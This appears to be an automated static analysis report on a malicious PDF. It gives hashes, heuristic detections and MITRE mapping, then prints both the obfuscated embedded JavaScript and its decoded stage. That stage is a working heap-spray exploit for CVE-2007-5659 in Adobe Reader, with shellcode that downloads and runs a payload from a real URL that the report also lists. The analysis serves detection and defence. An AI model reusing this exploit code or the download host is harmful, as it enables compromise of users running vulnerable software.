Malicious PDF — malware analysis report

Static analysis result for SHA-256 af08834115712db2…

MALICIOUS

PDF

4.5 KB Created: 2008-08-06 01:42:27 Authoring application: Scribus 1.3.3.12 (via Scribus PDF Library 1.3.3.12) First seen: 2026-05-08
MD5: 5c20a4def15c73271f84bcd25aa1ed2f SHA-1: 4fc00e916bc4ec74296b1689b30573c984756315 SHA-256: af08834115712db22ead2da6b7dab204511ff30ed11938ae4b363f018f033446
290 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. The presence of an eval() call (PDF_EVAL) suggests that the JavaScript code is obfuscated and likely intended to download and execute a second-stage payload. The extracted artifact 'javascript_obj0013_001.js' further supports this. The confidence is moderate due to the obfuscation preventing a full analysis of the script's exact actions.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 8

  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • JavaScript action low 3 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    function VkNY4I(){eval("function im"+"plo"+"de(gl"+"ue,pie"+"ces){return ((pieces instanceof Array)?pie"+"ce"+"s.jo"+"in(glu"+"e):pie"+"ces);}");eval("function I6dvF(OVNbEycvBgE8pF){return St"+"rin"+"g['fro"+"mCh"+"arC"+"ode']"+"(OVNbEycvBgE8pF)"+";"+"}");eval("function bgR9O(IOl9qjC){var vPzkInnzY="+"0,iYdjDpAr3gwa=IOl9qjC.l"+"en"+"gth,bxpP4=10"+"2"+"4,RBvNRJ0aAsmLd,qMYoWQrDNRrOPh,jDee937SB='',p5Tyhox5Nlb=vPzkInnzY,CoA6gZUNOxb=vPzkInnzY,Ck6iCGPpKso=vPzkInnzY,Ll85XisAX4F=Ar"+"ra"+"y(63,8,14,24,7 …
  • PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY
    Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://abb192.cn/exp/load.php?id=5093&spl=4 Referenced by PDF JavaScript

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0013_001.js pdf-javascript-stream PDF /JS object 13 at offset 0x364 6273 bytes
SHA-256: d516ee51afe02edc666140e54b277b4dd29b12dbcfd65a5059de76a08b7a1e80
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function VkNY4I(){eval("function im"+"plo"+"de(gl"+"ue,pie"+"ces){return ((pieces instanceof Array)?pie"+"ce"+"s.jo"+"in(glu"+"e):pie"+"ces);}");eval("function I6dvF(OVNbEycvBgE8pF){return St"+"rin"+"g['fro"+"mCh"+"arC"+"ode']"+"(OVNbEycvBgE8pF)"+";"+"}");eval("function bgR9O(IOl9qjC){var vPzkInnzY="+"0,iYdjDpAr3gwa=IOl9qjC.l"+"en"+"gth,bxpP4=10"+"2"+"4,RBvNRJ0aAsmLd,qMYoWQrDNRrOPh,jDee937SB='',p5Tyhox5Nlb=vPzkInnzY,CoA6gZUNOxb=vPzkInnzY,Ck6iCGPpKso=vPzkInnzY,Ll85XisAX4F=Ar"+"ra"+"y(63,8,14,24,7,48,32,31,49,15,0,0,0,0,0,0,5,3,4,9,34,1,38,30,13,60,41,36,2,47,23,44,55,54,21,26,20,0,28,18,6,22,37,0,0,0,0,51,0,61,59,58,33,56,25,35,52,16,39,11,29,17,42,12,62,45,53,43,57,40,10,46,50,19,27);f"+"o"+"r(qMYoWQrDNRrOPh=M"+"at"+"h.c"+"ei"+"l(iYdjDpAr3gwa/"+"bxpP4)"+";qMYoWQrDNRrOPh>vPzkInnzY;qMYoWQrDNRrOPh-"+"-){fo"+"r(RBvNRJ0aAsmLd=Ma"+"th.m"+"in(iYdjDpAr3gwa,bxpP4);RBvNRJ0aAsmLd>vPzkInnzY;RBvNRJ0aAsmLd-"+"-,iYdjDpAr3gwa-"+"-){Ck6iCGPpKso|"+"=(Ll85XisAX4F[IOl9qjC.cha"+"rCod"+"eAt(p5Tyhox5Nlb+"+"+)-48])<"+"<CoA6gZUNOxb;if(CoA6gZUNOxb){jDee937SB+"+"=I6dvF"+"(101^Ck6iCGPpKso&"+"2"+"5"+"5);Ck6iCGPpKso>"+">="+"8;CoA6gZUNOxb-"+"="+"2;}el"+"se{CoA6gZUNOxb="+"6"+";}}"+"}return (jDee937SB);}var Hja1gC4Iw01=implode('',['@HEENTBvO5ZBkeLR9BR@','NRRm3RhLU1mmKV8@B5myot','Rm','AU','8L','XBEAvOim1hmAYBiAVtxRUe5Cr','hRyJ','iyRgIUkF1y','UCRB@H3RkThW1oRK4@Cm','Ao','KU','U@rTvh','Tr195DCxB5WCU5LLBmA9lRYTh','6Rqi','mkd5K4Ji','yR','gIUkF1yU','@tB','Y@Z','LH','RHxAO3DoEe','@X@ZLHRHxAO','3DoETBY@ZL','HRH','x','AO3DoEOK','@iV','6@','mVEA','k1iy','RZB@H3R','k','ThW1vl@yGRh@UBEBNOimJiy','RgIUkF1yUGRBX','@HU','Bk3','i','Bou5','L','@@x','TQhi1','156@xB','mkUB5AH8','TmGThB','BVmmCI8LWlDk','2uLE','PVg@OTB','Y@RR4Rf','iRXT','ZERf','6N@','HE','ENThoW85C0TBY','@E8LU3dEBTEUH','l','BiiBZRmf@iiBZRmf@iiBZRm','f@iiTr16','V','Lii3ZRilLiiorTF5@iihRRj','5@iih','R','RRm@','iiUx1Y','f','@i','i','UxR','mf@','iiUxCgiLi','iUWNRE@iiox16','3Lii','ox1goLiihrCW','HL','iiBx1','mELiiUx16oLi','ioRT6','oLi','iUD','RK','oLii5r1','y@@i','i','Br','R','g3@ii5r1y@@iio@161@iiUx','1Rf','@','iiUx16','V','LiioRT6oL','ii','V','L','NRf@iio@R','lC@iiULR','Ki@iiTZTRf@iiU','x1Tm@iiUx','16oLiiiLCyH@iiVL','N6VLii1ZTl','C@iio@TTm@iiTZT','6i@i','i','U','x1THLi','iUx16o','LiiiLCy','H@ii','VLN61@i','i3LClC@iiiRR','iHLii','TZTN@','LiiUx','1R@LiiUx16oLiiiL','Cy','H@iiV','LN63','@','ii','TRR','lC@iiTr1Nm@iiTZTlHLiiUx1','Yl','LiiU','x','16oLiii','L','CyH@ii','VLNgoL','i','i','V','@1lC@iiT@C','VH@iiTZTiC@iiUx1','N','8','@iiUx16oLiiiLCyH@iiix','1','gV','L','iiB','DTyHLii5@C','N','fL','i','iorTTE@','iioDTKiLiiUWNR','H@iiUx16U','LiiVLR6','oLii','5@CyH@iioRTFV','LiiUxCKiLiiUL1lE@','iio','RTjo@i','ioDTjiLiiT','ZTj','5@i','iUx1','y@@iiUx16o','LiihZT','joLi','ioLTd5@','ii','5r1FT@ii1','RNRC@iiUx16oL','iiorT6oLiioDRK','iLi','iV@Cy','@@','iiVr1yfL','iiorTjoL','ii3x1KiL','iiiRRlC','@iiU','x16oLiiVx1','6oLiiiLCy@@iih','@TgVLi','i','V','xT6','BLiiVLCy@@','iiTZTg1@iiUx1','lELii','Ux16oLiii','L','C63Lii','VRNF','oLiiVD','R6oLii3L','RVm@iiVRN','lmLiiUxCKo','Liih@CVC@iiUx16oLii','5@CTR@iio','RTFoLi','iUD','RKiLi','iUL','1lE@','i','io','RTjo@i','ioDT','jiLii','ix1RC@iiUx16o','Liih@T6oLiiVDT6h@iiiLC63LiiBDCFVLii','VDCY@@iiiRRj3Lii3x1','Vm','LiiVDCj','oLiiiLCy@','@iih@','Tg3@iiV','xT6iL','iiV','LCy@','@i','iTZ','Tg1@','iiUx1F3LiiUx','16oLiiUx1lE@ii','5@CTR','@iioRTFo','LiiUDT','Ki','LiiUW','1','lE@iioRT','jo@iioDTjiLiiox1RC@iiUx16o','Liih@T6oLiio','RTTR@iiox1KiLi','iUL1lE@iioRT','jo@iioD','TjiLiiUx1RC@iiU','x1','6oLii','iL','16','oLiiVW1j','B@i','iT@163LiiT@1','63LiiT','@','16','3Li','iT@','163LiiTZRy','fLiiVLT6VLiioRTj3L','ii','TR','1Y','E','@iiVW1','T','r','@iiTr1T','R@iioRTji','LiioRTRf@ii','UD','TV','l@','iiVxRy@@ii','VLN63','@ii5ZCy@@i','ioRTd3@iioLRVlLi','iUDCVC@i','i','VL','N','TfLii5@Ny@@iiUDCF','o','LiiBD','CTf','Liii','xT','N','H@i','i','BrR','KU','Lii','VZC63LiiBD','C','j5@iiU','WRT8@iiox1im@i','iiR1dU','@','iiUDTVlLiiV@R','NELii','UDC','6V@iiix1T@Liii@1R@@iii@','R','dB@ii5@Cji@','iiVLTRmLiiTRT','y','@@','iiVLT','y@','@','iiU','DCFVLiih@N','Yl@ii','UDRy@@i','ioRTK','B@iioDRjU@ii','3r','R63LiiUx','Cy@@','iiUD','Cy@','@iiVLRNm','Lii','VR1jV@ii','Ux1','6','1@iiirC','RC@iii','RR','Tm@iiVLCT','R','@iiiDRjBLii','iW','RKV@iiUx','1Ki@ii','1R','Tyr','@ii1RRW','@@iiVr1YmLiio@RNHLiior','R','y','l@ii3@','NYm@iiV@','1','Yl@iio@1yf@','iio@','TNHLi','i1','RRWr@','iioZC','NHLiio@Ry','HLiiV@1y@@iioRNWR','@ii3','r1WR@iioRTy8@ii3','@TY@Li','i','3@NYR@','iiVrTYf','@ii1','RR','W','f','@','ii3R1y','fLiiTRRY@rmotRmyi','5@@d6HOuL95I5k','mIWm','3RTRl','BRRR','RR','RRt','R','m','yi5@@Z6CY@RkRZ6H@dR','m_1@AjI_W','CU5LLBmA@aTmNtRmyi','5@@mmAYrL@qBWm','3RBLQ5','DvI','U_A','MB8k@d','TmHZ6C','Y@RkRZ6','H2RR4','Yr@','yGR','hBBVmmJiyRgIUkF','1yU','@d','Rmi','OU','U','Y3UERUiy4EBBVR','@NREBBVR@NR','lByGRTvh','Tr195DCxBi','m3R','BLlh6@EhU','NwV@','U2VWH','lrTvhTr195D','CxBi','W','@mmAYrL@qBLyGRh','B','BVmm','hVETO','TZB@dRmHZ5','4k1r','C','we6','vBV_','H','Y5Wm1R','TRlBRRRRRRR8KW1','3Akn5Ao9IWBMeRmAu5@@r','hB','BVm','mhKW','Nq38R01','AU3RZNhKWN','q38','R01AUfm_@i8WRWe@HJ','hRkYVr9xU','6y28TmGTBvO5Z','BkeLR9BR@NRZ9h','KWNq38','R01','AUeTBY@','ZLH','R','H','xAO3DoETK','y@','H','gT','oVx9G','RBX','@dmm','AU8LXBEAv','Oi','mC','BA4NE','@Hw3_4R3LkH8TmGThB','B','VmmlBR','TooZT7','oD@Q','TB','Y@','m','i@R','OhBoU6BUV','8oUVd@ou5Lk@','dLQB8@oO6UH','8KN@rmTm','85','TW','a','81Y3ym3R','T4m@@AyCr4g3dHklEUR','KUEX','UiyvZ','y1vCiW','4lByGRhBBVm','m','VIxRJBy','m','3RhL','U1mmKV8@B5mylBRTooZT7oD','@QOKEH','i5@','KBmyR8TWlBRTo','oZT7oD@QOKEHi5@KBmy','T8TWlBRTooZT7oD@','QO','K','EHi5@KBmyN8ByGR','BA','A','T','TyH88kNZWopT','@2@d@Y@rRmAHTmH','rB4MVRv8eAR','eTB','Y3R','BR@Hhi@88kNZWo','pV@2@Z','RmN8TmfK','mmVIxRJBg9Td','ymf','RB','Ro8Tmf','K','mmH','88kNZWopT@2@d@Y','@CR','mAHTmVIxRJ','B','g9Td','ymfRB','R','oRTXfTTyVIx','RJBg9Rdy','mfRK','To','8TmG','TT','1yfyAd6UAY1yBqUiU','9hB','yGRhB','BVm','mMVxHUB','x','oirA','4idWm3','RBBkU6@Xii@','U','hh','mUEmRXTZE','UEm','RXT','ZE48KN@CmA','oKUUHaxCPUi1_U','R9V','U@vkZU','Uk1iBHT','T','Y','@','@RTVErRoRhk','jVAUdoATa5E','TuTKy3RhkjVAUdoATa5ETueRmm','hUAYO','KEvKiLBV6','Hmu5@UTBY@','fDLCKUE4OKEv','K','iLU','3iB66UEoKU','k','ko6LHtd@i','V','5A7','Rhm4ZB','L','Y','15N','@axC','PUi1_UR9V','U','@v35KN@dmm3TTL85','8','RimgkQIm@F5Wyot@']);");eval(bgR9O(Hja1gC4Iw01));}
generic_stage_recovery_000.js deobfuscated-js generic stage recovery sixbit-xor-table from JavaScript object 13 at offset 0x364 2555 bytes
SHA-256: fc391d89d1675bc6be514b66e5859247ee3a8fd817ea54ea3b06760a1dc08888
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 3 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var MI9wnK1j4p20 = new Array(); function mxhsdh9K2ekBP8(LQ0FjICWd, qh3HqHD) { while (LQ0FjICWd.length*2<qh3HqHD){LQ0FjICWd += LQ0FjICWd;} LQ0FjICWd = LQ0FjICWd.substring(0,qh3HqHD/2); return LQ0FjICWd; } function D6ShDmisWtHedj() { var lzn7BKkOaRRsI = 0x0c0c0c0c; var V7iBZ = unescape("%u4343%u4343%u4343%u0FEB%u335B%u66C9%u80B9%u8001%uEF33%uE243%uEBFA%uE805%uFFEC%uFFFF%u8B7F%uDF4E%uEFEF%u64EF%uE3AF%u9F64%u42F3%u9F64%u6EE7%uEF03%uEFEB%u64EF%uB903%u6187%uE1A1%u0703%uEF11%uEFEF%uAA66%uB9EB%u7787%u6511%u07E1%uEF1F%uEFEF%uAA66%uB9E7%uCA87%u105F%u072D%uEF0D%uEFEF%uAA66%uB9E3%u0087%u0F21%u078F%uEF3B%uEFEF%uAA66%uB9FF%u2E87%u0A96%u0757%uEF29%uEFEF%uAA66%uAFFB%uD76F%u9A2C%u6615%uF7AA%uE806%uEFEE%uB1EF%u9A66%u64CB%uEBAA%uEE85%u64B6%uF7BA%u07B9%uEF64%uEFEF%u87BF%uF5D9%u9FC0%u7807%uEFEF%u66EF%uF3AA%u2A64%u2F6C%u66BF%uCFAA%u1087%uEFEF%uBFEF%uAA64%u85FB%uB6ED%uBA64%u07F7%uEF8E%uEFEF%uAAEC%u28CF%uB3EF%uC191%u288A%uEBAF%u8A97%uEFEF%u9A10%u64CF%uE3AA%uEE85%u64B6%uF7BA%uAF07%uEFEF%u85EF%uB7E8%uAAEC%uDCCB%uBC34%u10BC%uCF9A%uBCBF%uAA64%u85F3%uB6EA%uBA64%u07F7%uEFCC%uEFEF%uEF85%u9A10%u64CF%uE7AA%uED85%u64B6%uF7BA%uFF07%uEFEF%u85EF%u6410%uFFAA%uEE85%u64B6%uF7BA%uEF07%uEFEF%uAEEF%uBDB4%u0EEC%u0EEC%u0EEC%u0EEC%u036C%uB5EB%u64BC%u0D35%uBD18%u0F10%u64BA%u6403%uE792%uB264%uB9E3%u9C64%u64D3%uF19B%uEC97%uB91C%u9964%uECCF%uDC1C%uA626%u42AE%u2CEC%uDCB9%uE019%uFF51%u1DD5%uE79B%u212E%uECE2%uAF1D%u1E04%u11D4%u9AB1%uB50A%u0464%uB564%uECCB%u8932%uE364%u64A4%uF3B5%u32EC%uEB64%uEC64%uB12A%u2DB2%uEFE7%u1B07%u1011%uBA10%uA3BD%uA0A2%uEFA1%u7468%u7074%u2F3A%u612F%u6262%u3931%u2E32%u6E63%u652F%u7078%u6C2F%u616F%u2E64%u6870%u3F70%u6469%u353D%u3930%u2633%u7073%u3D6C%u0034"); var mSIOYUjJtJ = 0x400000; var lC34H0lS = V7iBZ.length * 2; var qh3HqHD = mSIOYUjJtJ - (lC34H0lS+0x38); var LQ0FjICWd = unescape("%u9090%u9090"); LQ0FjICWd = mxhsdh9K2ekBP8(LQ0FjICWd, qh3HqHD); var Qr5I0w = (lzn7BKkOaRRsI - 0x400000)/mSIOYUjJtJ; for (var QL8Hs2ZWe=0;QL8Hs2ZWe<Qr5I0w;QL8Hs2ZWe++) { MI9wnK1j4p20[QL8Hs2ZWe] = LQ0FjICWd + V7iBZ; } } function lTy25QKSzpCI() { var x44i67zFsS = app.viewerVersion.toString(); x44i67zFsS = x44i67zFsS.replace(/\D/g,""); var yJ2LT = new Array(x44i67zFsS.charAt(0),x44i67zFsS.charAt(1),x44i67zFsS.charAt(2)); if ((yJ2LT[0] == 8 && ((yJ2LT[1] == 1 && yJ2LT[2] < 2) || yJ2LT[1] < 1)) || (yJ2LT[0] == 7 && yJ2LT[1] < 1) || (yJ2LT[0] < 7)) { D6ShDmisWtHedj(); var JBReDV5Xy5M = unescape("%u0c0c%u0c0c"); while(JBReDV5Xy5M.length < 44952) JBReDV5Xy5M += JBReDV5Xy5M; this.collabStore = Collab.collectEmailInfo({subj: "",msg: JBReDV5Xy5M}); } } lTy25QKSzpCI();